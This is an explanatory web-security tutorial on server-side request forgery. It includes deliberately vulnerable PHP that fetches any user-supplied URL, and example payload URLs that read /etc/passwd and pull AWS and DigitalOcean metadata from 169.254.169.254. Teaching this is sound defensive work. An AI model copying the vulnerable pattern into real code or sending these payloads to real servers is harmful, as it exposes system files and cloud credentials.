Server Side Request Forgery (SSRF)

Share on :

commonly known as SSRF vulnerability where an attacker can launch requests from the vulnerable server (web application) to other servers which can lead for Firewall bypass to let the attacker target internal servers which are not be exposed to the attacker

How it works

It happens usually when the application sends a request and gives the user partial control on the request (eg. part of URL) , an attacker may be able to exploit this situation to control the whole request to craft malicious requests from the target server (internal and external)

Severity

High

Impact

  1. Scan local or external network
  2. Read files from affected server
  3. Interact with internal systems
  4. Remote code execution

Example

in the following example we have a simple web-application which loads and displays images.

Vulnerable code

<?php

# Check if the 'url' GET variable is set
if (isset($_GET['image_url'])){
$url = $_GET['image_url'];

# Fetch the image from the user supplied URL
$file = fopen($url, 'rb');

# Send proper header for png images
header("Content-Type: image/png");

# Dump image file
fpassthru($file);
}

# Notify user if he didn't enter a URL
echo 'Please enter image url'

?>

let's load google's logo

http://localost/ssrf.php?image_url=https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png

Exploitation

we can read files from the server

http://localost/ssrf.php?image_url=file:///etc/passwd

Response

by looking at the page source we will find the /etc/passwd file in the response body

Extracting cloud metadata

to extract hostname AWS metadata we can use

http://localost/ssrf.php?image_url=http://169.254.169.254/latest/meta-data/hostname

for Digital ocean metadata

http://localost/ssrf.php?image_url=http://169.254.169.254/metadata/v1.json

Port scanning internal network

By using SSRF you can perform port scanning for the internal network to discover services running on the network whcih may lead to further exploitations .

Prevention

  1. Disabled unused URL schemas like file:// , ftp:// , gopher://
  2. Internal services has to protected by authentication to add an extra layer of protection